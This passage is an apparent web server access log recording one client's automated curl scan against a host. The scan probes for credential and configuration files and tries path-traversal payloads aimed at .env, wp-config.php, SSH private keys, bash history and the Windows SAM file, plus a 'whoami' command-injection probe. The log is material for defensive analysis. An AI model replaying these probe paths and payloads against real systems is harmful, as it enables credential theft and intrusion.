"/config/smtp.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/nft/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/gnss/receiver_config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/paypal.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/diag/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/cdn-cgi/trace" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/old/aws_config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:34 +0000] - 404 404 - GET https nas.profibot.hu "/sandbox/checkout/receipt.png" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/profile?id=2" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/robotframework/resources/settings.robot" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/certs/apache.crt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/local_settings.py" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/shell?input=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/dump.tar.gz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/crypto/payments/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/rewards/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/hardhat.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/doc_private/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/etc/default/msmtp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/fraud/score_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/vault.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/config.old" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/config/dev.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/headers/add?Authorization=Bearer%20injected_token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 403 403 - GET https nas.profibot.hu "/.netrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/flags/feature_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/helm/Chart.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/5g/core.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:35 +0000] - 404 404 - GET https nas.profibot.hu "/credit/scoring_matrix.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/api/debug" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/index.php.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/braintree.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/bookkeeping/journal_config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/api/auth" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/bootstrap" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/auth" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/api/proxy" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/payment_gateways/stripe.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/bolt/overview" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/CMakeLists.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/old/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/release/ipa.ipa" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/mailchimp/subscribe" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:36 +0000] - 404 404 - GET https nas.profibot.hu "/user" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/saas/subscription_policies.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/jobs/mailer.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/rdp_config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/aws.env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/mobile-test/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 403 403 - GET https nas.profibot.hu "/.env.dvc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/letsencrypt/options-ssl-nginx.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/setup/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/src/environments/environment.prod.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/config/etherscan.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 403 403 - GET https nas.profibot.hu "/.mailrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/aws.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 403 403 - GET https nas.profibot.hu "/.bash_profile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/sophos/endpoint.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/config/config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/fraudlabspro/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/files/theme/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/var/spool/mqueue/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/src/main.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/ios/Runner.xcodeproj/project.pbxproj" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:37 +0000] - 404 404 - GET https nas.profibot.hu "/lidar/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/static/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/api-keys.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/quantum/config.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/editor/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/binance.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/vendure/config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/text-base/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/risk/merchant_profile.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/pos/inventory_sync.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/ws/chatroom" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/retail/branch_terminal_config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/etc/audit/auditd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/hf_token.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/scene/vr_settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/tokens.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/medical/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/readme.html" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/backend_ui/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - 404 404 - GET https nas.profibot.hu "/adminer.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:38 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/ws/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/boot.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/config/cryptomus.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/braintree.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/poetry.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/intents.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/verify?jwt=eyJ..." [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/cs/server.profile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/fail2ban/jail.local" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/cms-admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/etc/ufw/ufw.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/waf/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/auth/bind-session" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/admin/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/lab/bci_pipeline.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/edge-ai/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/modules/payment/hooks.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:39 +0000] - 404 404 - GET https nas.profibot.hu "/aws-ses.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/group_vars/all.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/protonbridge/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/paypal.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/etc/msmtprc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/ewallets/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/internal/run" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/gtag/js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/old_version.tgz" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/device.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/prestashop-admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/test/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/language/en-GB/en-GB.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/jwt-decode" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/firmware/update.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/banking/api_keys.env" [Client 